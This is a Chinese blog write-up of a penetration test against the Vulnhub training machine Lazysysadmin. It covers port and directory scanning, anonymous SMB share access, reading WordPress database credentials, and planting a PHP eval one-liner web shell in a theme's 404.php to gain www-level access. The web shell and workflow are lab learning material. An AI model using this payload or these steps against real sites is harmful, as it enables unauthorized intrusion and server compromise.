Vulnhub靶机实战-Lazysysadmin

声明

好好学习,天天向上

搭建

使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连

渗透

存活扫描,发现目标

arp-scan -l

端口扫描

nmap -T4 -A 192.168.239.15 -p 1-65535 -oN nmap.A

在这里插入图片描述

有意思,开启端口不少

发现开启80,22,139,445,3306,6667

访问80

http://192.168.239.15

扫描目录

python3 dirsearch.py -u http://192.168.239.15

扫描结果

info.php
phpmyadmin
wordpress
wordpress/wp-admin
robots.txt

当然优点拿robots.txt开刀了

http://192.168.239.15/robots.txt

发现四个目录

/old/
/test/
/TR2/
/Backnode_files/

在这里插入图片描述

看了个寂寞,看看445吧,扫描445发现允许匿名访问

enum4linux 192.168.239.15

在这里插入图片描述

windows下,把共享添加到k盘

net use k: \\192.168.239.15\share$

在这里插入图片描述

查看一下wordpress的配置文件,看到数据库账号密码 Admin/TogieMYSQL12345^^

在这里插入图片描述

登入wordpress/wp-admin

http://192.168.239.15/wordpress/wp-admin
Admin
TogieMYSQL12345^^

老样子,编辑器主题编辑Editor写入一句话

404

<?php @eval($_REQUEST[1]); ?>

在这里插入图片描述

访问

http://192.168.239.15/wordpress/wp-content/themes/twentyfifteen/404.php?1=phpinfo();

在这里插入图片描述

菜刀连接

在这里插入图片描述

查看文件deets.txt,发现密码123456提示

在这里插入图片描述

查看home目录发现账户togie

在这里插入图片描述

ssh登录togie

ssh togie@193.168.239.15
123456

难受,我这里ssh连接失败,不知道大佬是怎么连上的,我这里只能获取www的权限

最后使用wordpress的php代码执行只拿到了www的权限
使用msf生成的木马
难受+耻辱

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值